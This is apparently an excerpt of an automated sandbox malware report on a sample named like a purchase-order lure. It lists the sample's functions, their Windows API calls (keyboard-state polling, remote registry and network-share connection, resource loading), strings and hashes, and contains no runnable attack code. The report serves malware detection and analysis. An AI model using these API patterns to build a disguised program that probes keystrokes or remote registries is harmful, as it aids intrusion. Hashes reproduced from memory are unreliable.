                                                                                                              • String ID: $EI$HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                              • API String ID: 3964851224-2147513561
                                                                                                              • Opcode ID: 992b8b08258db78b78476da350d782c966bf9a51c3c9f1ec58736869614c8ef3
                                                                                                              • Instruction ID: bbdea89195472bcc005644557164e13d2745037bec6aa9492b4c6e9b059d3e55
                                                                                                              • Opcode Fuzzy Hash: 992b8b08258db78b78476da350d782c966bf9a51c3c9f1ec58736869614c8ef3
                                                                                                              • Instruction Fuzzy Hash: DA41B17050028A9BEF01EF50D851AEB3721AF62751F104836FD551F2A2EB78AE0BCB18
                                                                                                              Function 004255BD Relevance: 19.7, APIs: 13, Instructions: 213windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • _memset.LIBCMT ref: 004255D7
                                                                                                              • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00425664
                                                                                                              • GetMenuItemCount.USER32(004A1708), ref: 004256ED
                                                                                                              • DeleteMenu.USER32(004A1708,00000005,00000000,000000F5,?,?), ref: 0042577D
                                                                                                              • DeleteMenu.USER32(004A1708,00000004,00000000), ref: 00425785
                                                                                                              • DeleteMenu.USER32(004A1708,00000006,00000000), ref: 0042578D
                                                                                                              • DeleteMenu.USER32(004A1708,00000003,00000000), ref: 00425795
                                                                                                              • GetMenuItemCount.USER32(004A1708), ref: 0042579D
                                                                                                              • SetMenuItemInfoW.USER32(004A1708,00000004,00000000,00000030), ref: 004257D3
                                                                                                              • GetCursorPos.USER32(?), ref: 004257DD
                                                                                                              • SetForegroundWindow.USER32(00000000), ref: 004257E6
                                                                                                              • TrackPopupMenuEx.USER32(004A1708,00000000,?,00000000,00000000,00000000), ref: 004257F9
                                                                                                              • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00425805
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                                              • String ID:
                                                                                                              • API String ID: 3993528054-0
                                                                                                              • Opcode ID: 2c4bfffb2ea69dafb8529ea07958a229928669921fb8e0f172963d5f5ef0f336
                                                                                                              • Instruction ID: 8ea68a115ba2e6fdfc3744fef9a916f631e96f1c5054a7488cee6be174aaf41b
                                                                                                              • Opcode Fuzzy Hash: 2c4bfffb2ea69dafb8529ea07958a229928669921fb8e0f172963d5f5ef0f336
                                                                                                              • Instruction Fuzzy Hash: D3712730B40625BEEB209B15EC49FAABF65FF40368FA44217F519AA2D0C7B85C10CB5D
                                                                                                              Function 0041A14D Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • _memset.LIBCMT ref: 0041A1DC
                                                                                                              • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 0041A211
                                                                                                              • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0041A22D
                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 0041A249
                                                                                                              • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 0041A273
                                                                                                              • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0041A29B
                                                                                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0041A2A6
                                                                                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0041A2AB
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                                                                                                              • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                              • API String ID: 1687751970-22481851
                                                                                                              • Opcode ID: bffe8d20610d47effe187b1e81593ebb8df0969a66e4e46b67d4039e0b8b0874
                                                                                                              • Instruction ID: a1edbafc751d18c1baae353c970e9bb6ca14f917cb061057d52f5d92af2e686f
                                                                                                              • Opcode Fuzzy Hash: bffe8d20610d47effe187b1e81593ebb8df0969a66e4e46b67d4039e0b8b0874
                                                                                                              • Instruction Fuzzy Hash: 57412872C10229ABCF12EFA5DC85DEEB778BF08344F00416AE901B72A0EB749E55CB54
                                                                                                              Function 004267E9 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 107windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • __swprintf.LIBCMT ref: 004267FD
                                                                                                              • __swprintf.LIBCMT ref: 0042680A
                                                                                                                • Part of subcall function 0040172B: __woutput_l.LIBCMT ref: 00401784
                                                                                                              • FindResourceW.KERNEL32(?,?,0000000E), ref: 00426834
                                                                                                              • LoadResource.KERNEL32(?,00000000), ref: 00426840
                                                                                                              • LockResource.KERNEL32(00000000), ref: 0042684D
                                                                                                              • FindResourceW.KERNEL32(?,?,00000003), ref: 0042686D
                                                                                                              • LoadResource.KERNEL32(?,00000000), ref: 0042687F
                                                                                                              • SizeofResource.KERNEL32(?,00000000), ref: 0042688E
                                                                                                              • LockResource.KERNEL32(?), ref: 0042689A
                                                                                                              • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 004268F9
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                                              • String ID: 5I
                                                                                                              • API String ID: 1433390588-1224781598
                                                                                                              • Opcode ID: 82c6fbd1fba5c00e3be05e722809ea159a819795221b3c69abe14021739758ff
                                                                                                              • Instruction ID: 89151df19e2cfe03f9b8906f98f4246fad024a6c2ace8079f14daf57a0bb62df
                                                                                                              • Opcode Fuzzy Hash: 82c6fbd1fba5c00e3be05e722809ea159a819795221b3c69abe14021739758ff
                                                                                                              • Instruction Fuzzy Hash: 3B31B371E0122AABDB10AF61ED54ABF7BA8EF08340F418436F902D2150E778D911DB69
                                                                                                              Function 004225B5 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 74windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,004536F4,00000010,?,Bad directive syntax error,0047DC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 004225D6
                                                                                                              • LoadStringW.USER32(00000000,?,004536F4,00000010), ref: 004225DD
                                                                                                              • _wprintf.LIBCMT ref: 00422610
                                                                                                              • __swprintf.LIBCMT ref: 00422632
                                                                                                              • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 004226A1
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                                                                                              • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                              • API String ID: 1080873982-4153970271
                                                                                                              • Opcode ID: 1fd3131bc57a964c67ff14952b0cb0f9fcb821546194d76598ebe847153e2d3b
                                                                                                              • Instruction ID: c9dbc3ecab387d9594e93d703b231b4b035f4e1d33c34af01576e33c2ba4d8df
                                                                                                              • Opcode Fuzzy Hash: 1fd3131bc57a964c67ff14952b0cb0f9fcb821546194d76598ebe847153e2d3b
                                                                                                              • Instruction Fuzzy Hash: 4A21713290026ABFCF12AF91CC06FEE7B35BF19308F004566F505660E2EAB9A615DB55
                                                                                                              Function 00427AD9 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00427B42
                                                                                                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00427B58
                                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00427B69
                                                                                                              • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00427B7B
                                                                                                              • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00427B8C
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: SendString
                                                                                                              • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                              • API String ID: 890592661-1007645807
                                                                                                              • Opcode ID: e4cc78555426ed0992b08946061a58aa3635ff0b525aef6559b8048c8fba53d2
                                                                                                              • Instruction ID: c3d92c902a2dd3c7b253b2b2fa4caa66031a799658d76ab22c829527f5173e18
                                                                                                              • Opcode Fuzzy Hash: e4cc78555426ed0992b08946061a58aa3635ff0b525aef6559b8048c8fba53d2
                                                                                                              • Instruction Fuzzy Hash: 471108A0A501B979DB20B7A2DC4AEFF7E7CEBD2B04F1005667411A60C0DAA81E45C6B4
                                                                                                              Function 0042778F Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • timeGetTime.WINMM ref: 00427794
                                                                                                                • Part of subcall function 003FDC38: timeGetTime.WINMM(?,75A8B400,004558AB), ref: 003FDC3C
                                                                                                              • Sleep.KERNEL32(0000000A), ref: 004277C0
                                                                                                              • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 004277E4
                                                                                                              • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00427806
                                                                                                              • SetActiveWindow.USER32 ref: 00427825
                                                                                                              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00427833
                                                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 00427852
                                                                                                              • Sleep.KERNEL32(000000FA), ref: 0042785D
                                                                                                              • IsWindow.USER32 ref: 00427869
                                                                                                              • EndDialog.USER32(00000000), ref: 0042787A
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                              • String ID: BUTTON
                                                                                                              • API String ID: 1194449130-3405671355
                                                                                                              • Opcode ID: fa9a771719a55a40c264ff48f6eeffcd9a69b113b04cf2e5b5ab968a518e10d6
                                                                                                              • Instruction ID: 5649146a899509660d0b0413ab4fab04e17e80b591bbec8f312168a2fd073354
                                                                                                              • Opcode Fuzzy Hash: fa9a771719a55a40c264ff48f6eeffcd9a69b113b04cf2e5b5ab968a518e10d6
                                                                                                              • Instruction Fuzzy Hash: 4E216570B08215AFE7015F21FC89B267F29F74634AB400136F50781261EBB95C01CB1E
                                                                                                              Function 004302EE Relevance: 18.3, APIs: 12, Instructions: 282comCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 003E936C: __swprintf.LIBCMT ref: 003E93AB
                                                                                                                • Part of subcall function 003E936C: __itow.LIBCMT ref: 003E93DF
                                                                                                              • CoInitialize.OLE32(00000000), ref: 0043034B
                                                                                                              • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 004303DE
                                                                                                              • SHGetDesktopFolder.SHELL32(?), ref: 004303F2
                                                                                                              • CoCreateInstance.OLE32(0046DA8C,00000000,00000001,00493CF8,?), ref: 0043043E
                                                                                                              • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 004304AD
                                                                                                              • CoTaskMemFree.OLE32(?,?), ref: 00430505
                                                                                                              • _memset.LIBCMT ref: 00430542
                                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 0043057E
                                                                                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 004305A1
                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 004305A8
                                                                                                              • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 004305DF
                                                                                                              • CoUninitialize.OLE32(00000001,00000000), ref: 004305E1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                                              • String ID:
                                                                                                              • API String ID: 1246142700-0
                                                                                                              • Opcode ID: 2fa1a8216cd9c53c28791a645c324d67e99b8903b89349608f558fa041b87446
                                                                                                              • Instruction ID: 284618c4664b57e5e9b577dc78c1d7ee8f359cd482684ea7d7bd29f711763f7e
                                                                                                              • Opcode Fuzzy Hash: 2fa1a8216cd9c53c28791a645c324d67e99b8903b89349608f558fa041b87446
                                                                                                              • Instruction Fuzzy Hash: 4BB1F874A00218AFDB04DFA5C898EAEBBB9FF48304F14856AF905EB251DB74ED41CB54
                                                                                                              Function 00422E5B Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetKeyboardState.USER32(?), ref: 00422ED6
                                                                                                              • SetKeyboardState.USER32(?), ref: 00422F41
                                                                                                              • GetAsyncKeyState.USER32(000000A0), ref: 00422F61
                                                                                                              • GetKeyState.USER32(000000A0), ref: 00422F78
                                                                                                              • GetAsyncKeyState.USER32(000000A1), ref: 00422FA7
                                                                                                              • GetKeyState.USER32(000000A1), ref: 00422FB8
                                                                                                              • GetAsyncKeyState.USER32(00000011), ref: 00422FE4
                                                                                                              • GetKeyState.USER32(00000011), ref: 00422FF2
                                                                                                              • GetAsyncKeyState.USER32(00000012), ref: 0042301B
                                                                                                              • GetKeyState.USER32(00000012), ref: 00423029
                                                                                                              • GetAsyncKeyState.USER32(0000005B), ref: 00423052
                                                                                                              • GetKeyState.USER32(0000005B), ref: 00423060
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: State$Async$Keyboard
                                                                                                              • String ID:
                                                                                                              • API String ID: 541375521-0
                                                                                                              • Opcode ID: e6f67ce6858ad763d1fc8b054214a6357ef6e63aad715ff087fec12e3f8c1871
                                                                                                              • Instruction ID: 44953d1ab677f1ca5930683e9fa639e8b8b3eb678c47302c49d6bf2878f93a26
                                                                                                              • Opcode Fuzzy Hash: e6f67ce6858ad763d1fc8b054214a6357ef6e63aad715ff087fec12e3f8c1871
                                                                                                              • Instruction Fuzzy Hash: 8551F920B047A439FB35DB6095007EBBBB45F11344F88459FD5C2562C2DADC9B4CC76A
                                                                                                              Function 0041ED02 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,00000001), ref: 0041ED1E
                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 0041ED30
                                                                                                              • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0041ED8E
                                                                                                              • GetDlgItem.USER32(?,00000002), ref: 0041ED99
                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 0041EDAB
                                                                                                              • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0041EE01
                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 0041EE0F
                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 0041EE20
                                                                                                              • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0041EE63
                                                                                                              • GetDlgItem.USER32(?,000003EA), ref: 0041EE71
                                                                                                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0041EE8E
                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0041EE9B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$ItemMoveRect$Invalidate
                                                                                                              • String ID:
                                                                                                              • API String ID: 3096461208-0
                                                                                                              • Opcode ID: 6597f89c22f5edb333499d6429069cbc7828679c4ab3cb3db13f0a7f7ccd7b68
                                                                                                              • Instruction ID: e9d64ac534a1e7decc8a3fc208947fa474065dddd55bd4fbbd363c00264d2988
                                                                                                              • Opcode Fuzzy Hash: 6597f89c22f5edb333499d6429069cbc7828679c4ab3cb3db13f0a7f7ccd7b68
                                                                                                              • Instruction Fuzzy Hash: E5510175F00205AFDB18CF69DD85AAEBBBAFB88700F148129F919D7290E7B49D408B14
                                                                                                              Function 003FB73E Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 003FB9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,003FB759,?,00000000,?,?,?,?,003FB72B,00000000,?), ref: 003FBA58
                                                                                                              • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,003FB72B), ref: 003FB7F6
                                                                                                              • KillTimer.USER32(00000000,?,00000000,?,?,?,?,003FB72B,00000000,?,?,003FB2EF,?,?), ref: 003FB88D
                                                                                                              • DestroyAcceleratorTable.USER32(00000000), ref: 0045D8A6
                                                                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003FB72B,00000000,?,?,003FB2EF,?,?), ref: 0045D8D7
                                                                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003FB72B,00000000,?,?,003FB2EF,?,?), ref: 0045D8EE
                                                                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003FB72B,00000000,?,?,003FB2EF,?,?), ref: 0045D90A
                                                                                                              • DeleteObject.GDI32(00000000), ref: 0045D91C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 641708696-0
                                                                                                              • Opcode ID: 64b4219416aa4f3a899fc2335e0e7302bf86e6614d06c8951a67778ff0da9eda
                                                                                                              • Instruction ID: 94f5c17a5a650e9160df49503a3daa8f396d42f64d9add0e1757a3f5fd21a86a
                                                                                                              • Opcode Fuzzy Hash: 64b4219416aa4f3a899fc2335e0e7302bf86e6614d06c8951a67778ff0da9eda
                                                                                                              • Instruction Fuzzy Hash: 5F61BDB0901604CFDB36AF14D988B36BBF5FF95356F14402EE5428AA70C774A884CF89
                                                                                                              Function 003FB40A Relevance: 18.1, APIs: 12, Instructions: 131COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 003FB526: GetWindowLongW.USER32(?,000000EB), ref: 003FB537
                                                                                                              • GetSysColor.USER32(0000000F), ref: 003FB438
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ColorLongWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 259745315-0
                                                                                                              • Opcode ID: f3dba1efb17f06b41b317d42d5c7ccda9b7785f4e0d6d156633fbdd247c6e6fb
                                                                                                              • Instruction ID: 623726f7cc2c32dc4052196fbe22883a8a1e95c7d3e760782c8d286ddf5a8ace
                                                                                                              • Opcode Fuzzy Hash: f3dba1efb17f06b41b317d42d5c7ccda9b7785f4e0d6d156633fbdd247c6e6fb
                                                                                                              • Instruction Fuzzy Hash: 4B41D270900108AFDB225F29DD89BB97B66AF06731F194261FE658E1E7D7708C41CB26
                                                                                                              Function 0042690B Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                                              • String ID:
